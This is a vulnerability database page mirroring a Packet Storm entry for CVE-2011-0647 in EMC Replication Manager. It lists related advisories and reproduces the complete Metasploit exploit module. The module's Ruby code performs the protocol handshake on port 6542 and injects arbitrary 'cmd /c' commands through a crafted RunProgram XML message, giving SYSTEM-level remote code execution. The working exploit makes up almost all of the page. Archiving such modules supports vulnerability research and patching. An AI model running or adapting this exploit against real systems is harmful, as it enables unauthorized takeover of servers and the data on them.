Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EMC Replication Manager Command Execution

🗓️ 23 Oct 2013 00:00:00Reported by temp66Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

EMC Replication Manager Command Execution vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		EMC Replication Manager Command Execution Vulnerability
23 Oct 201300:00
zdt
Circl		CVE-2011-0647
27 Feb 201100:00
circl
Check Point Advisories		EMC Replication Manager Command Execution - Ver2 (CVE-2011-0647)
28 Dec 201400:00
checkpoint_advisories
CVE		CVE-2011-0647
10 Feb 201117:00
cve
Cvelist		CVE-2011-0647
10 Feb 201117:00
cvelist
Exploit DB		EMC Replication Manager < 5.3 - Command Execution (Metasploit)
23 Mar 201700:00
exploitdb
Exploit DB		EMC Replication Manager &lt; 5.3 - Command Execution (Metasploit)
27 Feb 201100:00
exploitdb
Metasploit		EMC Replication Manager Command Execution
17 Oct 201314:51
metasploit
NVD		CVE-2011-0647
10 Feb 201118:00
nvd
Prion		Design/Logic Flaw
10 Feb 201118:00
prion
Rows per page
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::CmdStagerVBS  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'EMC Replication Manager Command Execution',  
'Description' => %q{  
This module exploits a remote command-injection vulnerability in EMC Replication Manager  
client (irccd.exe). By sending a specially crafted message invoking RunProgram function an  
attacker may be able to execute arbitrary code commands with SYSTEM privileges. Affected  
products are EMC Replication Manager < 5.3. This module has been successfully tested  
against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft  
Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested  
against these products.  
},  
'Author' =>  
[  
'Unknown', #Initial discovery  
'Davy Douhine' #MSF module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-0647' ],  
[ 'OSVDB', '70853' ],  
[ 'BID', '46235' ],  
[ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ]  
],  
'DisclosureDate' => 'Feb 07 2011',  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Payload' =>  
{  
'Space' => 4096,  
'DisableNops' => true  
},  
'Targets' =>  
[  
# Tested on Windows XP and Windows 2003  
[ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]  
],  
'DefaultOptions' =>  
{  
'WfsDelay' => 5  
},  
'DefaultTarget' => 0,  
'Privileged' => true  
))  
  
register_options(  
[  
Opt::RPORT(6542)  
], self.class)  
end  
  
def exploit  
execute_cmdstager({:linemax => 5000})  
end  
  
def execute_command(cmd, opts)  
connect  
hello = "1HELLOEMC00000000000000000000000"  
vprint_status("Sending hello...")  
sock.put(hello)  
result = sock.get_once || ''  
if result =~ /RAWHELLO/  
vprint_good("Expected hello response")  
else  
disconnect  
fail_with(Failure::Unknown ,"Failed to hello the server")  
end  
  
start_session = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>"  
vprint_status("Starting session...")  
sock.put(start_session)  
result = sock.get_once || ''  
if result =~ /EMC/  
vprint_good("A session has been created. Good.")  
else  
disconnect  
fail_with(Failure::Unknown, "Failed to create the session")  
end  
  
run_prog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> "  
run_prog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>"  
run_prog << "<ir_runProgramAppInfo><?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" "  
run_prog << "ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" "  
run_prog << "><?xml version="1.0" encoding="UTF-8"? > <ir_message ir_sessionId="00000" "  
run_prog << "ir_requestId="00000"ir_type="App Info" ir_status="0"><aa_anywriter_ccr_node>CM1109A1"  
run_prog << "</aa_anywriter_ccr_node><aa_anywriter_fail_1018>0</aa_anywriter_fail_1018><aa_anywriter_fail_1019>0"  
run_prog << "</aa_anywriter_fail_1019><aa_anywriter_fail_1022>0</aa_anywriter_fail_1022><aa_anywriter_runeseutil>1"  
run_prog << "</aa_anywriter_runeseutil><aa_anywriter_ccr_role>2</aa_anywriter_ccr_role><aa_anywriter_prescript>"  
run_prog << "</aa_anywriter_prescript><aa_anywriter_postscript></aa_anywriter_postscript><aa_anywriter_backuptype>1"  
run_prog << "</aa_anywriter_backuptype><aa_anywriter_fail_447>0</aa_anywriter_fail_447><aa_anywriter_fail_448>0"  
run_prog << "</aa_anywriter_fail_448><aa_exchange_ignore_all>0</aa_exchange_ignore_all><aa_anywriter_sthread_eseutil>0&amp"  
run_prog << ";lt;/aa_anywriter_sthread_eseutil><aa_anywriter_required_logs>0</aa_anywriter_required_logs><aa_anywriter_required_logs_path"  
run_prog << "></aa_anywriter_required_logs_path><aa_anywriter_throttle>1</aa_anywriter_throttle><aa_anywriter_throttle_ios>300"  
run_prog << "</aa_anywriter_throttle_ios><aa_anywriter_throttle_dur>1000</aa_anywriter_throttle_dur><aa_backup_username>"  
run_prog << "</aa_backup_username><aa_backup_password></aa_backup_password><aa_exchange_checksince>1335208339"  
run_prog << "</aa_exchange_checksince> </ir_message></IR_groupEntry> </ir_message></ir_runProgramAppInfo>"  
run_prog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>"  
run_prog_header = "EMC_Len000000"  
run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog  
  
vprint_status("Executing command....")  
sock.put(run_prog_packet)  
sock.get_once(-1, 1)  
  
end_string = Rex::Text.rand_text_alpha(rand(10)+32)  
sock.put(end_string)  
sock.get_once(-1, 1)  
disconnect  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Oct 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.77518
metasploitremote command injectionemc replication managervulnerable productsexploitcve-2011-0647osvdb-70853bid-46235command executionwindows platformarch-x86xml injection vulnerabilitysystem privileges.
31